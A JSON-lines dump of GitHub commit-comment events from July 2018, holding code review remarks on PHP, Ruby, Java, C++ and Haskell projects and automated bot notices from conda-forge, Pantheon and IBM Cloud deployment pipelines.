{"id":"7938972560","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29645053,"position":15,"line":30,"path":"config/web.php","commit_id":"b06f7d043e610de98b579ec6f34a63092d9c07e6","created_at":"2018-07-09T17:15:42Z","updated_at":"2018-07-09T17:15:42Z","author_association":"NONE","body":"Комментарии надо удалять перед коммитом)"}},"created_at":"2018-07-09T17:15:42Z"}
{"id":"7938976239","type":"CommitCommentEvent","actor":{"login":"LoaiKalam"},"repo":{"name":"LoaiKalam/course-collaboration-travel-plans"},"payload":{"comment":{"id":29645060,"position":10,"line":49,"path":"css/app.css","commit_id":"b2d03536aff58643adec3db169c832069c9c9d32","created_at":"2018-07-09T17:16:26Z","updated_at":"2018-07-09T17:16:26Z","author_association":"OWNER","body":"lk"}},"created_at":"2018-07-09T17:16:26Z"}
{"id":"7938976863","type":"CommitCommentEvent","actor":{"login":"MarkRivers"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":29645063,"position":null,"line":null,"path":null,"commit_id":"6637eaa1a8accf306ce75e49b8beae5b607be2c8","created_at":"2018-07-09T17:16:34Z","updated_at":"2018-07-09T17:16:34Z","author_association":"MEMBER","body":"I have released areaDetector and ADCore R3-3-2.  This supports WITH_QSRV.  If WITH_PVA=YES and WITH_QSRV=NO then it will include pvAccess support but not qsrv. \r\n\r\nI tested switching WITH_QSRV=YES and NO and verified that it properly includeded/omitted the qsrv dbd and lib files when building ADSimDetector.  I was not able to test that WITH_PVA=YES and WITH_QSRV=NO works on 3.14.12."}},"created_at":"2018-07-09T17:16:34Z"}
{"id":"7938977518","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29645064,"position":19,"line":46,"path":"controllers/NoteaccessController.php","commit_id":"b06f7d043e610de98b579ec6f34a63092d9c07e6","created_at":"2018-07-09T17:16:41Z","updated_at":"2018-07-09T17:16:41Z","author_association":"NONE","body":"yii !== Yii. Обрати на это внимание, иногда может вызывать неявное поведение"}},"created_at":"2018-07-09T17:16:41Z"}
{"id":"7938978486","type":"CommitCommentEvent","actor":{"login":"pfpjs"},"repo":{"name":"chapmanb/cloudbiolinux"},"payload":{"comment":{"id":29645067,"position":12,"line":13,"path":"ggd-recipes/GRCh37/giab-NA12878-NA24385-somatic.yaml","commit_id":"b5a1699dd9b01258940b6b61447d72a18d9a88ce","created_at":"2018-07-09T17:16:53Z","updated_at":"2018-07-09T17:16:53Z","author_association":"NONE","body":"Hi @chapmanb,\r\nThe trailing slash in this file (and in `ggd-recipes/hg38/giab-NA12878-NA24385-somatic.yaml`) is making my wget throw a 404 Not Found error:\r\n```\r\nRunning GGD recipe: GRCh37 giab-NA12878-NA24385-somatic v3_3_2-2018-07-05\r\n--2018-07-09 14:02:41--  https://s3.amazonaws.com/bcbio/giab/NA12878-NA24385/2018-07-05//na12878-na24385-somatic-GRCh37-truth.vcf.gz\r\nResolving s3.amazonaws.com... 54.231.72.154\r\nConnecting to s3.amazonaws.com|54.231.72.154|:443... connected.\r\nHTTP request sent, awaiting response... 404 Not Found\r\n2018-07-09 14:02:42 ERROR 404: Not Found.\r\n```\r\nRemoving the double `\\\\` allows the file to be downloaded.\r\nThanks for looking into this!"}},"created_at":"2018-07-09T17:16:53Z"}
{"id":"7938979485","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"spring-cloud/spring-cloud-gcp"},"payload":{"comment":{"id":29645071,"position":29,"line":206,"path":"spring-cloud-gcp-pubsub/src/main/java/org/springframework/cloud/gcp/pubsub/PubSubAdmin.java","commit_id":"d3dea6a125e7d475c8a529b3f45f5a5be68a3c72","created_at":"2018-07-09T17:17:06Z","updated_at":"2018-07-09T17:17:06Z","author_association":"COLLABORATOR","body":"That's a great pointer. In this case, however, I think the compiler will have no problem optimizing away the concatenation."}},"created_at":"2018-07-09T17:17:06Z"}
{"id":"7938983140","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29645081,"position":29,"line":80,"path":"controllers/NoteaccessController.php","commit_id":"b06f7d043e610de98b579ec6f34a63092d9c07e6","created_at":"2018-07-09T17:17:47Z","updated_at":"2018-07-09T17:17:47Z","author_association":"NONE","body":"Не стоит писать в одну строчку. PSR это не поощряет, да и читается так немного труднее."}},"created_at":"2018-07-09T17:17:47Z"}
{"id":"7938987376","type":"CommitCommentEvent","actor":{"login":"kyzyltanatuva"},"repo":{"name":"kyzyltanatuva/hello-world"},"payload":{"comment":{"id":29645094,"position":1,"line":1,"path":"README.md","commit_id":"6e52e2d21b33c888ee2c6ae33d8545a6437fdde2","created_at":"2018-07-09T17:18:37Z","updated_at":"2018-07-09T17:18:37Z","author_association":"OWNER","body":"Comment"}},"created_at":"2018-07-09T17:18:37Z"}
{"id":"7938988241","type":"CommitCommentEvent","actor":{"login":"IgorRodchenkov"},"repo":{"name":"BioPAX/Paxtools"},"payload":{"comment":{"id":29645097,"position":null,"line":null,"path":null,"commit_id":"2343712f086b41b363fc139a81e584eb5109852f","created_at":"2018-07-09T17:18:47Z","updated_at":"2018-07-09T17:18:47Z","author_association":"MEMBER","body":"Refs #39 "}},"created_at":"2018-07-09T17:18:47Z"}
{"id":"7938989536","type":"CommitCommentEvent","actor":{"login":"dengchao-ryan"},"repo":{"name":"dengchao-ryan/AngularLean"},"payload":{"comment":{"id":29645102,"position":null,"line":null,"path":null,"commit_id":"f70547d77cd022816dcd405af41d8604245aeb0d","created_at":"2018-07-09T17:19:03Z","updated_at":"2018-07-09T17:19:03Z","author_association":"OWNER","body":"虽然添加了路由，但是运行应用，却什么也没有显示，仔细检查代码没问题。后面会继续排查，谢谢！"}},"created_at":"2018-07-09T17:19:03Z"}
{"id":"7938989743","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29645106,"position":16,"line":16,"path":"migrations/m180709_113826_access_date.php","commit_id":"b06f7d043e610de98b579ec6f34a63092d9c07e6","created_at":"2018-07-09T17:19:05Z","updated_at":"2018-07-09T17:19:05Z","author_association":"NONE","body":"имена колонок в mysql принято называть в snake_case. Это немного конфликтует с рекомендациями PHP по camelCase, но в целом это принимается в yii2 моделях. "}},"created_at":"2018-07-09T17:19:05Z"}
{"id":"7938994150","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29645113,"position":null,"line":null,"path":null,"commit_id":"c048939df6606a7dd66380a03c37177868d39b99","created_at":"2018-07-09T17:19:59Z","updated_at":"2018-07-09T17:19:59Z","author_association":"OWNER","body":"I would call it `GetChunks` rather than `ChunkBack`."}},"created_at":"2018-07-09T17:19:59Z"}
{"id":"7939000188","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29645123,"position":null,"line":null,"path":null,"commit_id":"5753874562f56d225176694bf9f3e54d1a0932b8","created_at":"2018-07-09T17:21:10Z","updated_at":"2018-07-09T17:21:10Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-09T17:21:10Z"}
{"id":"7939000606","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29645124,"position":1,"line":null,"path":"1531156873.75/github_test.txt","commit_id":"930ec27208a444de4ce4c30723fa343fd12c0b8a","created_at":"2018-07-09T17:21:15Z","updated_at":"2018-07-09T17:21:15Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-09T17:21:15Z"}
{"id":"7939003377","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29645131,"position":null,"line":null,"path":null,"commit_id":"fbb397bad8dcdc7bb2acfd3332db631df61b8cbc","created_at":"2018-07-09T17:21:49Z","updated_at":"2018-07-09T17:21:49Z","author_association":"NONE","body":"1. если дефиниция с аперсандом перед аргументом, то при вызове передаем блок в метод в виде блока, т.е. дефиниция:\r\n  ```ruby\r\n  def method_name(&block)\r\n    yield(10)\r\n  end\r\n  ```\r\n  либо:\r\n  ```ruby\r\n  def method_name(&block)\r\n    block.call(10)\r\n  end\r\n  ```\r\n  и тогда вызов должен быть таким:\r\n  ```ruby\r\n  method_name { |x| puts x }\r\n  ```\r\n2. если дефиниция без амперсанда перед аргументом, то можно передать лямбду или прок в аргументах:\r\n  ```ruby\r\n  def method_name(block)\r\n    block.call(20)\r\n  end\r\n  ```\r\n  тут нужно передать в аргументах прок или лямбду:\r\n  ```ruby\r\n  method_name(Proc.new { |x| puts x })\r\n  ```\r\n3. когда дефиниция без аргумента (или с аргументом, но он используется как обычный аргумент, а блок передается отдельно), то:\r\n  ```ruby\r\n  def method_name\r\n    yield(30)\r\n  end\r\n  ```\r\n  значит вызов метода должен быть с явной передачей блока:\r\n  ```ruby\r\n  method_name { |x| puts x }\r\n  ```\r\n  этот вариант самый быстрый, первый хотя выглядит похоже все равно преобразует блок в `Proc` и поэтому просаживается по производительности\r\n4. еще вариант - задать метод без принятия аргументов, потом создать \"упакованный блок\", т.е. к примеру Прок... потом передать его с амперсандом\r\n  ```ruby\r\n  def method_name\r\n    yield(30)\r\n  end\r\n  ```\r\n  и вызов вот такого вида:\r\n  ```ruby\r\n  method_name(&Proc.new{ |x| puts x })\r\n  ```\r\nвсе эти способы будут работать\r\nоднако лучше всего использовать номер 3 (из соображений производительности)\r\n\r\nесли же передаешь Прок, либо Лямбда, то я бы скорее предпочел в методе обращаться к блоку в явном виде, через `block.call(agruments)`\r\nт.е. 2-ой вариант, потому что он более явный (возможно это \"вкусовщина\" :))\r\n\r\nну и повторюсь, что в принципе работают все варианты ))"}},"created_at":"2018-07-09T17:21:49Z"}
{"id":"7939005976","type":"CommitCommentEvent","actor":{"login":"arnobaer"},"repo":{"name":"arnobaer/hls4gtl-fork"},"payload":{"comment":{"id":29645135,"position":32,"line":16,"path":"tb/algos_test_4_c_cosim.cpp","commit_id":"831a18877a44b0967b604443b7234c0579c3bdec","created_at":"2018-07-09T17:22:21Z","updated_at":"2018-07-09T17:22:21Z","author_association":"OWNER","body":"The braces have no effect, only `pt` is initialized but not `eta`/`phi`. If compiled with `-Wall` it will create a warnings: `warning: left operand of comma operator has no effect [-Wunused-value]`\r\nStructs can be initialized using curly braces `{...}`, eg. `{{0, 0, 0}, ...}`.\r\nN.B. in this case the compiler yields an error because `jet_obj_t` got only two attributes (`pt` and `eta`)!"}},"created_at":"2018-07-09T17:22:21Z"}
{"id":"7939006720","type":"CommitCommentEvent","actor":{"login":"kenrube"},"repo":{"name":"kittinunf/Fuel"},"payload":{"comment":{"id":29645137,"position":null,"line":null,"path":null,"commit_id":"f91a6b114b6426e128cdaa57dcc2224461057069","created_at":"2018-07-09T17:22:30Z","updated_at":"2018-07-09T17:22:30Z","author_association":"NONE","body":"I think this will fix [issue #356](https://github.com/kittinunf/Fuel/issues/356)"}},"created_at":"2018-07-09T17:22:30Z"}
{"id":"7939008077","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29645143,"position":38,"line":114,"path":"code/Example/Drasil/GamePhysics/Body.hs","commit_id":"b99a40fcbf731fbb5f2465b2eaa6cf19499d5488","created_at":"2018-07-09T17:22:46Z","updated_at":"2018-07-09T17:22:46Z","author_association":"OWNER","body":"Because I was thinking that, in the future, we might want different equivalence relations on `DefinedQuantityDict`.\r\n\r\nBut, thinking some more, this is quite unlikely. So you can indeed leave things as they are."}},"created_at":"2018-07-09T17:22:46Z"}
{"id":"7939014718","type":"CommitCommentEvent","actor":{"login":"klahnakoski"},"repo":{"name":"mozilla/TUID"},"payload":{"comment":{"id":29645155,"position":34,"line":1418,"path":"tuid/service.py","commit_id":"81019f8b39eab233ebc5fe165a994db47b8b710f","created_at":"2018-07-09T17:24:10Z","updated_at":"2018-07-09T17:24:10Z","author_association":"COLLABORATOR","body":"I do not think this will work; it will pull many less records than needed.  I suggest the WHERE clause to be \r\n\r\n    SQL_OR.join(esfilter2where({\"and\":[\r\n        {\"eq\":{\"revision\":rev}},\r\n        {\"eq\":{\"file\":file}},\r\n        {\"eq\":{\"line: line}}\r\n    ]}) for file, rev, line in line_origins)"}},"created_at":"2018-07-09T17:24:10Z"}
{"id":"7939039033","type":"CommitCommentEvent","actor":{"login":"velhbxtyrj"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29645223,"position":null,"line":null,"path":null,"commit_id":"dc399437d0b6a35efcaeff0ef857089150a78393","created_at":"2018-07-09T17:29:03Z","updated_at":"2018-07-09T17:29:03Z","author_association":"COLLABORATOR","body":"One single minus that JavaScript on remembering the selected section works a little incorrectly. If we move to a subsection and then open the menu of another section and update the page, the second selected partition will be displayed (according to the logic, we should display the section in which we are currently located).\r\n\r\n**If anyone has the desire to correct the JavaScript I will be very grateful :)**"}},"created_at":"2018-07-09T17:29:03Z"}
{"id":"7939039888","type":"CommitCommentEvent","actor":{"login":"koral--"},"repo":{"name":"thinkhy/STFService.apk"},"payload":{"comment":{"id":29645225,"position":3,"line":446,"path":"app/src/main/java/jp/co/cyberagent/stf/Service.java","commit_id":"ef1c65dc47a9ee6e585da4becfbe661557e3fb73","created_at":"2018-07-09T17:29:13Z","updated_at":"2018-07-09T17:29:13Z","author_association":"NONE","body":"This comment is not needed and can be removed."}},"created_at":"2018-07-09T17:29:13Z"}
{"id":"7939040407","type":"CommitCommentEvent","actor":{"login":"SMarjanAlavi"},"repo":{"name":"SMarjanAlavi/ML"},"payload":{"comment":{"id":29645226,"position":null,"line":null,"path":null,"commit_id":"3114954bddc7b6dd941e46fe1813a1904c285c41","created_at":"2018-07-09T17:29:20Z","updated_at":"2018-07-09T17:29:20Z","author_association":"OWNER","body":"Basic Git instructions in command"}},"created_at":"2018-07-09T17:29:20Z"}
{"id":"7939040436","type":"CommitCommentEvent","actor":{"login":"decebals"},"repo":{"name":"pf4j/pf4j"},"payload":{"comment":{"id":29645227,"position":null,"line":null,"path":null,"commit_id":"bb88abaea256dd0bb16513645cae734e77a6859b","created_at":"2018-07-09T17:29:20Z","updated_at":"2018-07-09T17:29:20Z","author_association":"MEMBER","body":"Thanks! I change the content of this method."}},"created_at":"2018-07-09T17:29:20Z"}
{"id":"7939045409","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29645238,"position":24,"line":35,"path":"code/Language/Drasil/SentenceExtract.hs","commit_id":"6a447f0ea6b4ebf032201ebeec6be4a515ed046e","created_at":"2018-07-09T17:30:18Z","updated_at":"2018-07-09T17:30:18Z","author_association":"OWNER","body":"Thank you - it's good now."}},"created_at":"2018-07-09T17:30:18Z"}
{"id":"7939046565","type":"CommitCommentEvent","actor":{"login":"Smita83"},"repo":{"name":"Smita83/TestRepo"},"payload":{"comment":{"id":29645240,"position":null,"line":null,"path":null,"commit_id":"ca2218552050dd2dd5248f058d745222651a286f","created_at":"2018-07-09T17:30:31Z","updated_at":"2018-07-09T17:30:31Z","author_association":"OWNER","body":"Check"}},"created_at":"2018-07-09T17:30:31Z"}
{"id":"7939047219","type":"CommitCommentEvent","actor":{"login":"Zeddikus97"},"repo":{"name":"GrSU-lab/map-of-road-signs-backend"},"payload":{"comment":{"id":29645242,"position":null,"line":null,"path":null,"commit_id":"c2627bd60225cce63a280080316f8835f91d577c","created_at":"2018-07-09T17:30:38Z","updated_at":"2018-07-09T17:30:38Z","author_association":"COLLABORATOR","body":"Great"}},"created_at":"2018-07-09T17:30:38Z"}
{"id":"7939047443","type":"CommitCommentEvent","actor":{"login":"Zeddikus97"},"repo":{"name":"GrSU-lab/map-of-road-signs-backend"},"payload":{"comment":{"id":29645243,"position":null,"line":null,"path":null,"commit_id":"c2627bd60225cce63a280080316f8835f91d577c","created_at":"2018-07-09T17:30:41Z","updated_at":"2018-07-09T17:30:41Z","author_association":"COLLABORATOR","body":"Great"}},"created_at":"2018-07-09T17:30:41Z"}
{"id":"7939047759","type":"CommitCommentEvent","actor":{"login":"Smita83"},"repo":{"name":"Smita83/TestRepo"},"payload":{"comment":{"id":29645244,"position":5,"line":6,"path":"README.md","commit_id":"ca2218552050dd2dd5248f058d745222651a286f","created_at":"2018-07-09T17:30:44Z","updated_at":"2018-07-09T17:30:44Z","author_association":"OWNER","body":"Check"}},"created_at":"2018-07-09T17:30:44Z"}
{"id":"7939048435","type":"CommitCommentEvent","actor":{"login":"SMarjanAlavi"},"repo":{"name":"SMarjanAlavi/ML"},"payload":{"comment":{"id":29645245,"position":null,"line":null,"path":null,"commit_id":"8f59ecce69588a44a1a76851f8e27468632f80c3","created_at":"2018-07-09T17:30:51Z","updated_at":"2018-07-09T17:30:51Z","author_association":"OWNER","body":"Ok!"}},"created_at":"2018-07-09T17:30:51Z"}
{"id":"7939049520","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29645249,"position":null,"line":null,"path":null,"commit_id":"de1efc50088aa6e16eff63d7dd313d013f46be25","created_at":"2018-07-09T17:31:05Z","updated_at":"2018-07-09T17:31:05Z","author_association":"OWNER","body":"Thank you."}},"created_at":"2018-07-09T17:31:05Z"}
{"id":"7939049813","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29645250,"position":null,"line":null,"path":null,"commit_id":"c1e4a83c690648a2acef1ddf9ed5e3d4e40965fd","created_at":"2018-07-09T17:31:08Z","updated_at":"2018-07-09T17:31:08Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-190](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-190).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-190-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-09T17:31:08Z"}
{"id":"7939051767","type":"CommitCommentEvent","actor":{"login":"artembilan"},"repo":{"name":"spring-cloud/spring-cloud-gcp"},"payload":{"comment":{"id":29645259,"position":29,"line":206,"path":"spring-cloud-gcp-pubsub/src/main/java/org/springframework/cloud/gcp/pubsub/PubSubAdmin.java","commit_id":"d3dea6a125e7d475c8a529b3f45f5a5be68a3c72","created_at":"2018-07-09T17:31:30Z","updated_at":"2018-07-09T17:31:30Z","author_association":"CONTRIBUTOR","body":"That's correct: it is converted to the `StringBuilder` during compilation, but `append()` is still performed during the main flow independently of the assertion result. The main my point that if our assert is `true`, we don't jump to the concatenation (append) at all."}},"created_at":"2018-07-09T17:31:30Z"}
{"id":"7939060410","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/flask-bootstrap-feedstock"},"payload":{"comment":{"id":29645275,"position":null,"line":null,"path":null,"commit_id":"816b7a13cf9c5f98097f0a904f827da9ffbfa1a3","created_at":"2018-07-09T17:33:16Z","updated_at":"2018-07-09T17:33:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @corburn were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T17:33:16Z"}
{"id":"7939061653","type":"CommitCommentEvent","actor":{"login":"djaivaziusibmcom"},"repo":{"name":"djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300"},"payload":{"comment":{"id":29645279,"position":null,"line":null,"path":null,"commit_id":"c5173d56d347364a42aa1cf72760abc3ea401d17","created_at":"2018-07-09T17:33:31Z","updated_at":"2018-07-09T17:33:31Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8404dd36-df44-4600-87c8-292bb5550add?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180706220104300\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f3b05135-cb54-4e54-bd05-9116eb9eda8f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180706220104300\") deployed [sample-cloud-native-toolchain-tutorial-20180706220104300](https://github.com/djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300/releases/tag/deploy-ibm-yp-us-south-djaivazi-us.ibm.com-test-20180709-173330 \"deploy-ibm-yp-us-south-djaivazi-us.ibm.com-test-20180709-173330\") to [test](https://console.bluemix.net/apps/485f4b56-6b11-459f-a1db-f606ef9e4a6a?env_id=ibm:yp:us-south \"ibm:yp:us-south:djaivazi@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-09T17:33:31Z"}
{"id":"7939063855","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/flask-bower-feedstock"},"payload":{"comment":{"id":29645283,"position":null,"line":null,"path":null,"commit_id":"a15b0c13ff31fd011d51ba7af511ebee70935617","created_at":"2018-07-09T17:33:58Z","updated_at":"2018-07-09T17:33:58Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @corburn were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T17:33:58Z"}
{"id":"7939065830","type":"CommitCommentEvent","actor":{"login":"abrookbanks"},"repo":{"name":"cubecart/v6"},"payload":{"comment":{"id":29645285,"position":null,"line":null,"path":null,"commit_id":"e08f64b9e504b699cbb0e314cace05ae8816b969","created_at":"2018-07-09T17:34:22Z","updated_at":"2018-07-09T17:34:22Z","author_association":"MEMBER","body":"Great! Thanks for reporting it."}},"created_at":"2018-07-09T17:34:22Z"}
{"id":"7939066887","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29645288,"position":null,"line":null,"path":null,"commit_id":"be9a78f8d865ea6cfa0aaa7128a90f30704be724","created_at":"2018-07-09T17:34:35Z","updated_at":"2018-07-09T17:34:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-441](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-441).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-441-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T17:34:35Z"}
{"id":"7939070025","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/flask-markdown-feedstock"},"payload":{"comment":{"id":29645295,"position":null,"line":null,"path":null,"commit_id":"a3b5f12e1e4f1b3c03477383f2cae4fb9d926fec","created_at":"2018-07-09T17:35:14Z","updated_at":"2018-07-09T17:35:14Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @corburn were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T17:35:14Z"}
{"id":"7939070875","type":"CommitCommentEvent","actor":{"login":"rchl2"},"repo":{"name":"LosSantosOnline/gamemode"},"payload":{"comment":{"id":29645297,"position":22,"line":18,"path":"client_packages/LSOnline/Player/PlayerRender.js","commit_id":"e0348c8ad759257a121dbce09bd030a73d6f2d40","created_at":"2018-07-09T17:35:24Z","updated_at":"2018-07-09T17:35:24Z","author_association":"CONTRIBUTOR","body":"this need to be reworked. only for test purposes."}},"created_at":"2018-07-09T17:35:24Z"}
{"id":"7939073147","type":"CommitCommentEvent","actor":{"login":"rchl2"},"repo":{"name":"LosSantosOnline/gamemode"},"payload":{"comment":{"id":29645302,"position":19,"line":27,"path":"client_packages/LSOnline/Vehicle/VehicleEvents.js","commit_id":"e0348c8ad759257a121dbce09bd030a73d6f2d40","created_at":"2018-07-09T17:35:52Z","updated_at":"2018-07-09T17:35:52Z","author_association":"CONTRIBUTOR","body":"only for test purposes"}},"created_at":"2018-07-09T17:35:52Z"}
{"id":"7939074184","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645309,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-09T17:36:03Z","updated_at":"2018-07-09T17:36:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T17:36:03Z"}
{"id":"7939074368","type":"CommitCommentEvent","actor":{"login":"Bob7999"},"repo":{"name":"Bob7999/ProejctElevenStartedOnLocalRepo"},"payload":{"comment":{"id":29645310,"position":null,"line":null,"path":null,"commit_id":"1b2d72c6992de48e38282528d7152ab0d350c973","created_at":"2018-07-09T17:36:06Z","updated_at":"2018-07-09T17:36:06Z","author_association":"OWNER","body":"Alas, the undone commit didn't seem to sync over to Git Hub."}},"created_at":"2018-07-09T17:36:06Z"}
{"id":"7939077663","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/flask-nav-feedstock"},"payload":{"comment":{"id":29645316,"position":null,"line":null,"path":null,"commit_id":"57ac2f0c0ed790b98e006ad71a575848d4cb5ad5","created_at":"2018-07-09T17:36:43Z","updated_at":"2018-07-09T17:36:43Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @corburn were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T17:36:43Z"}
{"id":"7939079296","type":"CommitCommentEvent","actor":{"login":"djaivaziusibmcom"},"repo":{"name":"djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300"},"payload":{"comment":{"id":29645319,"position":null,"line":null,"path":null,"commit_id":"c5173d56d347364a42aa1cf72760abc3ea401d17","created_at":"2018-07-09T17:37:04Z","updated_at":"2018-07-09T17:37:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8404dd36-df44-4600-87c8-292bb5550add?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180706220104300\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f3b05135-cb54-4e54-bd05-9116eb9eda8f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180706220104300\") deployed [sample-cloud-native-toolchain-tutorial-20180706220104300](https://github.com/djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300/releases/tag/deploy-ibm-yp-us-south-djaivazi-us.ibm.com-prod-20180709-173703 \"deploy-ibm-yp-us-south-djaivazi-us.ibm.com-prod-20180709-173703\") to [prod](https://console.bluemix.net/apps/6496619c-af6f-47c6-a432-e8188265e5a0?env_id=ibm:yp:us-south \"ibm:yp:us-south:djaivazi@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-09T17:37:04Z"}
